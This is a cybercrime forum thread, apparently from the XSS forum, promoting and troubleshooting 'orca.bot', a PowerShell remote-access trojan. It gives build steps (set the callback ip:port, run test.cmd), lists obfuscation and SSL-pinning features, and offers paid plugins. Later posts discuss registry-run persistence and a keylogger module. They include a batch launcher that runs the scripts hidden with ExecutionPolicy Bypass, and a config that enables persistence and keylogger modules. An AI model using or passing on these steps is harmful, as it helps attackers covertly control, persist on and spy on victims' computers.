• XSS.stack #1 – первый литературный журнал от юзеров форума

malware orca.bot [powershell]

Отслеживать
To build
Just change ip:port in sub folder (main.ps1) to ur no-ip or domain ip
Hit test.cmd to run the script in ur machine
It should appear in controler as new connection

All other configs are optional
Features:
-Ssl encryption & Ssl pinning
-Plugins script system
-Build in script obfuscation
-Http pooling & HTTP push and pull connections
-Full free gui filemanager plugin
For special gui plugins like filemanger u can dm (paid service)
 
Последнее редактирование:
Houdini сказал(а):
To build
Just change ip:port in sub folder (main.ps1) to ur no-ip or domain ip
Hit test.cmd to run the script in ur machine
It should appear in controler as new connection

All other configs are optional
Features:
-Ssl encryption & Ssl pinning
-Plugins script system
-Build in script obfuscation
-Http pooling & HTTP push and pull connections
-Full free gui filemanager plugin
For special gui plugins like filemanger u can dm (paid service)
Thanks for the Loader

There is a question, how to make a bus load right after the start of the build?

by how much fixing in the system should be done manually

I tried to add function Set-RunOnce At the end of the file main.ps1
 
Mains.ps1 has a function call modules
Wish has several module files that will requested & load from ./scripts/me folder at initialization every time
So u can update/encrypt if needed

Set-RunOnce is a function on module ,/persistence ,u can edit at ur best persistent method and mine is just a simple
 
Houdini сказал(а):
Mains.ps1 has a function call modules
Wish has several module files that will requested & load from ./scripts/me folder at initialization every time
So u can update/encrypt if needed

Set-RunOnce is a function on module ,/persistence ,u can edit at ur best persistent method and mine is just a simple
Код: 
@echo off                                                                    
for /L %%a in (1,1,1) do (
start /b cmd /c powershell -ExecutionPolicy Bypass -WindowStyle hidden ./main.ps1
start /b cmd /c powershell -ExecutionPolicy Bypass -WindowStyle hidden ./persistence.ps1    
)
pause

I edited a bat file

It seems to work, Record is in the registry
 
Последнее редактирование:
Houdini сказал(а):
U can run only main.ps1
And it will load persistence.ps1 on startup automatically ,try
If it starts automatically, then the panel must be kept constantly open on a remote Windows server?

I have so far settled on the option of using a VPN connection, there is not always a remote Windows server at hand
 
Yes ,when panel goes online, main.ps1 it will initially modules like persistent or keylogger One time for good
Generally those modules not require run every time , they are offline functions and i preferred to do that way (rather then build in or hardcoded down url) for better update&encrypt if needed
It just an optionally think, u can edit as ur better need
 
Houdini сказал(а):
Yes ,when panel goes online, main.ps1 it will initially modules like persistent or keylogger One time for good
Generally those modules not require run every time , they are offline functions and i preferred to do that way (rather then build in or hardcoded down url) for better update&encrypt if needed
It just an optionally think, u can edit as ur better need


Код: 
$global:modules     =  @{
    running = $false
    list = '.\me\persistence\main.ps1','.\me\keylogger\main.ps1'
}


does false it true need to be changed?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх